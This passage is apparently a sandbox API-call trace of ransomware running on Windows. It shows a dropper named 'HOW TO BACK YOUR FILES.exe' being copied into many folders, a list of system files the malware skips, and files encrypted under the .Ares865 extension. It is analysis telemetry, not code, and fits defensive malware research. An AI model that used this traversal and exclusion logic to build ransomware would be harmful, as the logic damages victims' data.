ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.591] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.591] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.591] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.592] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.592] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.592] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.592] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.592] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.592] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.592] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.592] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.592] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c50 [0090.592] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO" [0090.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3213f0 | out: hHeap=0x2b0000) returned 1 [0090.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0090.592] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO") returned 68 [0090.592] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO" [0090.592] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\visio\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.593] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.593] GetLastError () returned 0x0 [0090.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.593] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.593] CloseHandle (hObject=0x120) returned 1 [0090.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.593] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.593] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\VISIO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.593] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.593] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.593] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.593] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.593] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.593] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.593] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.593] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.593] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.593] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.593] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.593] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.593] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c70 [0090.593] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault" [0090.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321358 | out: hHeap=0x2b0000) returned 1 [0090.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0090.594] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault") returned 68 [0090.594] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault" [0090.594] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.594] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\vault\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.594] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.594] GetLastError () returned 0x0 [0090.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.594] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.594] CloseHandle (hObject=0x120) returned 1 [0090.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.595] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.595] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Vault\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.595] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.595] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.595] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.595] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c52b0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.595] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.595] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.595] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.595] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.595] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.595] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.595] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c52b0c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c52b0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.595] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.595] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c90 [0090.595] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures" [0090.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0090.595] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures") returned 84 [0090.595] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures" [0090.595] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.595] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\user account pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.596] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.596] GetLastError () returned 0x0 [0090.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.596] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.596] CloseHandle (hObject=0x120) returned 1 [0090.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.596] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63ee73e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63ee73e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.596] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.596] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.596] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.596] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63ee73e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63ee73e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.597] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.597] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.597] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.597] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.597] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29423840, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz.dat.Ares865", cAlternateFileName="5P5NRG~1.ARE")) returned 1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="aoldtz.exe") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2=".") returned 1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="..") returned 1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="windows") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="bootmgr") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="temp") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="pagefile.sys") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="boot") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="ids.txt") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="ntuser.dat") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="perflogs") returned -1 [0090.597] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865", lpString2="MSBuild") returned -1 [0090.597] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz.dat.Ares865") returned 32 [0090.597] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\*") returned 86 [0090.597] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="5p5NrGJn0jS HALPmcxz.dat.Ares865" | out: lpString1="5p5NrGJn0jS HALPmcxz.dat.Ares865") returned="5p5NrGJn0jS HALPmcxz.dat.Ares865" [0090.597] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz.dat.Ares865") returned 32 [0090.597] lstrlenW (lpString="Ares865") returned 7 [0090.597] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.597] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x646c9cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x646c9cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="aoldtz.exe") returned 1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2=".") returned 1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="..") returned 1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="windows") returned -1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="bootmgr") returned 1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="temp") returned -1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="pagefile.sys") returned -1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="boot") returned 1 [0090.597] lstrcmpiW (lpString1="Default Pictures", lpString2="ids.txt") returned -1 [0090.598] lstrcmpiW (lpString1="Default Pictures", lpString2="ntuser.dat") returned -1 [0090.598] lstrcmpiW (lpString1="Default Pictures", lpString2="perflogs") returned -1 [0090.598] lstrcmpiW (lpString1="Default Pictures", lpString2="MSBuild") returned -1 [0090.598] lstrlenW (lpString="Default Pictures") returned 16 [0090.598] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.Ares865") returned 117 [0090.598] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="Default Pictures" | out: lpString1="Default Pictures") returned="Default Pictures" [0090.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0090.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xcc) returned 0x2d40a8 [0090.598] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0090.598] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x63e9b120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="guest.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.598] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.598] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.598] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2=".") returned 1 [0090.598] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2="..") returned 1 [0090.598] lstrcmpiW (lpString1="guest.bmp.Ares865", lpString2="windows") returned -1 [0090.598] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures" [0090.598] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0090.598] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0090.598] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures") returned 101 [0090.598] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures" [0090.598] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.598] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\User Account Pictures\\Default Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\user account pictures\\default pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.599] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.599] GetLastError () returned 0x0 [0090.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 